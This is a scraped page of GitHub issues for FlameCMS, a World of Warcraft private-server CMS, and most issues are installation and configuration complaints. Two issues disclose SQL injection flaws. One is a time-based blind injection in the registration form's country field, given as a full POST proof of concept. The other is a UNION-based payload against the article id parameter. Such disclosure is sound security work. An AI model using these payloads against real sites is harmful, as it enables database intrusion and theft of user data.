flamenet / flamecms Goto Github PK

First, when I clic on next step in the second step, there is an error with the link, and there is no extension (thesite.com/install/step-3 and .PHP is not here)

Then, when I fill in the form, I Obtain the errors that appears in the image.

¿Some one know the solution?

Game Guide, Armory, Login and so on...everything missing?

Do you guys dont share these files or what do i need to do to get them?

Want to back this issue? Post a bounty on it! We accept bounties via Bountysource.

Hi.
If possible realise registration for trinity core 6.0.x ?
SOAP or PHP, but need this for last rev of TC.
Tnx.

Want to back this issue? Place a bounty on it! We accept bounties via Bountysource.

This is a preview of how an issue is supposed to be placed!
Your title of the issue should be placed with a number (ex: [2]), a name (ex: [2] News not posting), a dollar number if you donate for the fix (ex: [2] News not posting [5$]) and a [BUG].
Then, for the main textarea you should state your problem specifically and provide an image so WE developers can understand and look to your problem easier.

IF

You are posting for an upgrade then you have to follow what is said before, BUT add [UPG] to the title
ex: [2] Shop System [10$] [UPG]

Thank you for reading my Base Template for posting an issue!
Sincerely,
Alex-FailZorD

Want to back this issue? Post a bounty on it! We accept bounties via Bountysource.

Hello
There is a Time-based blind injection vulnerability here too：
FlameCMS-master/account/register.php

poc ：
POST /FlameCMS-master/account/register?XDEBUG_SESSION_START=16052 HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 379
Connection: close
Referer: http://127.0.0.1:8888/FlameCMS-master/account/register?XDEBUG_SESSION_START=19560
Cookie: bdshare_firstime=1521359417238; _ga=GA1.1.1769867541.1569134195; mprtcl-v4_CCA8AE13={'gs':{'ie':1|'dt':'719f10ea1d9f664eab8238c61651c212'|'cgid':'319bce97-c8d8-46c5-8392-475ba6458c8a'|'das':'52a59f82-afe9-4f23-a231-edd8a11fc7d1'}|'l':0|'2092622027007090544':{'fst':1569134198283}|'cu':'2092622027007090544'}; PHPSESSID=dc9b176c866392458b9562d3ff8f6840; XDEBUG_SESSION=16052
Upgrade-Insecure-Requests: 1

csrftoken=6d42030c-2ad6-4fa2-b3be-0ba74e5aa7aa&country=CRItest',concat('test',(select sleep(if(length(user())>1,1,0)))),'333');#&ret=&sourceType=&dobMonth=1&dobDay=1&dobYear=2015&firstname=11111&lastname=11111&emailAddress=431%4011.com&emailAddressConfirmation=431%4011.com&password=11111&rePassword=11111&question1=19&answer1=bmw&agreedToChatPolicy=true&agreedToToU=true&submit

Time based injection and need to write the new emailAddress everytime to test

i register with country Germany and enter my datails
the account is stored in the cms database as CRI (Costa Rica)!?

will the bnetaccount in the auth database created when the user sends back his activation code? i tested it with manualy hit the check button in the account table in the cms database, but nothing happens, only the account entry is made, but user needs the bnetaccount enty to log in.

we have an problem, this two branches didn't create account on install, now the admin panel is not avaliable. problem.
any other developers, please read this.
gettings from:
Adomasalcore3

Want to back this issue? Post a bounty on it! We accept bounties via Bountysource.

Hello.

I'd just installed the latest version on my website, http://wow-wrath.com/beta3
The issue is tho, I can only see text and not the template it self. Any reason to why this could be? The setup was successful. I am online at Skype: Swockale

Want to back this issue? Post a bounty on it! We accept bounties via Bountysource.

When I try to install the cms I click the install now button and I immediately get pushed to a 404 page at step 2.

Using IIS 8.0 on Windows Server 2012 r2, usually I have no problem with rewrite rules but this one has me scratching my head.

Also you have serveral:
Warning: Cannot modify header information - headers already sent by (output started at ROOT\wowserver\index.php:2)

You may need to check files for white spaces.

Hey,
I just tried to install FlameCMS (6.x.x branch) but I always get the following error:
Failed to connect to MySQL: Access denied for user 'cms'@'localhost' (using password: YES)

I'm 100% sure that I'm using the correct password.
And the weird part is that if I try to connect to the DB with the cms user I can connect to it without any problems :/

Can this CMS be used for non WOW private servers? Or is it made specificially for WOW?

I get "Parse error: syntax error, unexpected ')' in C:\xampp\htdocs\system\config.php on line 2" after installing FlameCMS

Before I try to install this, there is an update feature like the one in FusionCMS? Because I used that one for a bit but with small to no luck, because they seems to be working on a new one, obviously not caring about the previous version.

If not, it'd be cool to implement one, so maybe it will autoupdate with some zips :D

hello
There is a sql injection vulnerability here：
FlameCMS-master/article.php

http://127.0.0.1:8888/FlameCMS-master/article?id=1

payload:
id=-3521' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178766271,0x7849574d434964786d6d53677a775679504d4e506c7563456d516b75474f634652545662506a5073,0x71767a6271),NULL,NULL-- auYF

account creation does not work just says accounts not activated after you create an account. also does not add to database.

Want to back this issue? Post a bounty on it! We accept bounties via Bountysource.

I have problems in the first step of the installation. When I have all successfully uploaded to the FTP server my site and subsequently entered the web address into the browser jumped me this error. I was wondering whether there is no need to change the attributes but if so I do not know to what

Warning: session_start(): Cannot send session cookie - headers already sent by (output started at /data/web/virtuals/44875/virtual/www/subdom/wotlkptr/index.php:2) in /data/web/virtuals/44875/virtual/www/subdom/wotlkptr/system/config.php on line 28

Warning: session_start(): Cannot send session cache limiter - headers already sent (output started at /data/web/virtuals/44875/virtual/www/subdom/wotlkptr/index.php:2) in /data/web/virtuals/44875/virtual/www/subdom/wotlkptr/system/config.php on line 28

Warning: Cannot modify header information - headers already sent by (output started at /data/web/virtuals/44875/virtual/www/subdom/wotlkptr/index.php:2) in /data/web/virtuals/44875/virtual/www/subdom/wotlkptr/system/core.php on line 28

Warning: Cannot modify header information - headers already sent by (output started at /data/web/virtuals/44875/virtual/www/subdom/wotlkptr/index.php:2) in /data/web/virtuals/44875/virtual/www/subdom/wotlkptr/system/core.php on line 111

Cant install on another server.
but! I configured different host, no localhost. Any solutions how to fix it?

error code:
Trying to connect to database...
Failed to connect to MySQL: Access denied for user 'root'@'localhost' (using password: YES)

Well, during installation it gives me "ERR_TOO_MANY_REDIRECTS".
I tried disabling Cloudflare on my host, but no luck.

How can I fix that?

EDIT:
Ok, I managed to get this installed by manually editing my system/config.php file, but... nothing is working xD My login doesn't simply work, it says I "need to activate" my account.

Obviously there's a HUGE issue with url redirection, since everytime I click on login it brings me to myurl.com/login/myurl.com/login/myurl.com/login and so on.

For now, it's not worth installing it, but it's an interesting project!

Want to back this issue? Post a bounty on it! We accept bounties via Bountysource.